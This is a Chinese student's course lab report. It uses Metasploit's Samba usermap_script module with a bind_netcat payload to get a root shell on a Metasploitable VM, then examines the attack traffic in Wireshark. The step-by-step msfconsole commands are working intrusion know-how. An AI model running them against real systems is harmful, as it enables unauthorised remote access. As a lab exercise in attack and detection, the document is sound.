20252907 2025-2026-2 《网络攻防实践》第七周作业

20252907 2025-2026-2 《网络攻防实践》第七周作业

1.实践内容

(1)使用Metasploit开展Linux远程渗透攻击

核心任务:运用Metasploit渗透测试工具,针对Linux靶机上Samba服务存在的Usermap_script安全漏洞实施渗透攻击,成功获取目标Linux靶机的主机访问权限。具体实践步骤如下:

  1. 启动Metasploit渗透测试软件,可根据个人操作习惯,选择msfconsole(命令行模式)、msfgui(图形界面模式)或msfweb(网页模式)中的任意一种启动方式。
  2. 加载渗透攻击模块,选用exploit/multi/samba/usermap_script模块,该模块专门用于利用Samba服务的Usermap_script漏洞进行攻击。
  3. 选择攻击载荷(PAYLOAD),确定使用远程Shell类型,正向连接或反向连接两种方式均可,可根据实际网络环境灵活选择。
  4. 配置渗透攻击相关参数,准确设置目标主机IP(RHOST)、本地主机IP(LHOST)、目标系统类型(TARGET)等关键参数,确保参数配置正确无误。
  5. 执行渗透攻击操作,启动攻击流程,密切观察攻击过程中的状态反馈。
  6. 验证攻击结果,检查是否成功获取目标主机的远程Shell,同时查看当前获得的主机访问权限等级,确认攻击效果。

(2)实践作业:攻防对抗实践

本次实践作业采用攻防对抗模式,分为攻击方与防守方两个角色,具体任务要求如下:

攻击方任务

使用Metasploit渗透测试工具,对Metasploitable靶机进行漏洞扫描与识别,选取靶机中存在的可利用漏洞实施渗透攻击,成功获取靶机的远程控制权后,进一步尝试提升权限,直至获得root超级用户权限。

防守方任务

使用tcpdump、wireshark或snort等网络监听与分析工具,对网络流量进行实时监听,捕获攻击过程中产生的所有数据包并保存为数据包文件。随后结合wireshark或snort工具对捕获的数据包进行深入分析,明确攻击相关关键信息,具体包括:攻击者IP地址、目标主机IP地址及攻击端口、攻击发起时间、攻击所利用的具体漏洞、攻击过程中使用的Shellcode,以及攻击成功后攻击者在靶机命令行中输入的所有操作指令信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

首先启动Kali虚拟机与Metasploitable虚拟机,启动完成后,在两台虚拟机中分别执行对应命令查看其网络信息。经查看,Kali虚拟机的IP地址为192.168.200.7,Metasploitable虚拟机的IP地址为192.168.200.8。

image-20260420141051134

使用ping命令检查二者的连通性,可以ping通说明连通性正常

image-20260420143527661然后在kali虚拟机中切换root权限后输入命令msfconsole启动Metasploit渗透软件

image-20260420143750279

然后再输入命令search samba查找要使用的漏洞模块

image-20260420143835281

输入命令search usermap_script查找到要使用的usermap_script安全漏洞

image-20260420143921269

输入命令use exploit/multi/samba/usermap_script使用渗透攻击模块

image-20260420144056090

输入命令show payloads查看与该渗透攻击模块相兼容的攻击载荷

image-20260420144146761

输入命令set payload cmd/unix/bind_netcat设置攻击载荷为bind_netcat,输入命令options查看需配置的参数

image-20260420144316050

输入命令与对应的靶机和攻击机IP地址,将Metasploitable虚拟机设置为靶机,将kali虚拟机设置为攻击机

set RHOST 192.169.200.8

set LHOST 192.168.200.7

image-20260420145411380

输入exploit或run开始攻击,输入ifconfig查看网络信息,显示的是靶机的网络信息(IP地址192.168.200.8),攻击成功

image-20260420145533524

2.2 攻防对抗实践

攻击方zyx's kali(192.168.200.7),防守方Metasploitable_ubuntu(192.168.200.8)

类似2.1当中的设置好靶机IP与攻击机IP后,打开wireshark准备抓包

image-20260420145832686

输入exploit攻击成功后,wireshark监听到大量的网络流量数据包

image-20260420145914826

依次输入命令shell和id查看shell权限账户及其所在的权限组

image-20260420150054055

输入命令whoami查看到当前账户是root权限

image-20260420150123681

在顶部过滤栏输入以下过滤语句,只显示攻击机与靶机之间的流量:

ip.addr == 192.168.200.7 && ip.addr == 192.168.200.8

从过滤后的流量中可以清晰看到:

  • 源IP地址:192.168.200.7(攻击机)
  • 目的IP地址:192.168.200.8(靶机)
  • 目标端口:445(Samba服务默认端口)
  • 主要协议:TCP、SMB协议

在数据包列表中找到包含SMB协议的核心攻击数据包,右键点击选择Follow→TCP Stream,追踪TCP流查看完整的攻击交互过程。

追踪数据流发现攻击机利用4444号端口与靶机建立telnet服务

image-20260420150759451

继续追踪TCP数据流可以看到攻击后输入的指令信息

image-20260420150855165

3.学习中遇到的问题及解决

  • 问题1:使用exploit失败

    image-20260420151034867

  • 问题1解决方案:ip设置错误,192.168.200.8,不小心打成了192.169.200.8

4.收获与总结

本次网络攻防实践中,我熟练掌握了 Metasploit 框架漏洞利用的基本流程,同时作为防守方,运用 tcpdump 和 Wireshark 捕获分析攻击流量,提升了对网络攻击本质及防御方法的认知。实验让我深刻意识到,未及时修补的老旧漏洞(如 Samba usermap_script 漏洞)仍会带来严重安全威胁,也让我明白及时打补丁、关闭无用服务是基础且重要的防护措施。此外,实验中排查问题的过程锻炼了我的解决问题能力,相较于实践六,我对相关工具的使用更加熟练,对攻防思路的理解也更为深刻。

posted @ 2026-04-20 15:37  起个名字叫土匪  阅读(22)  评论(0)    收藏  举报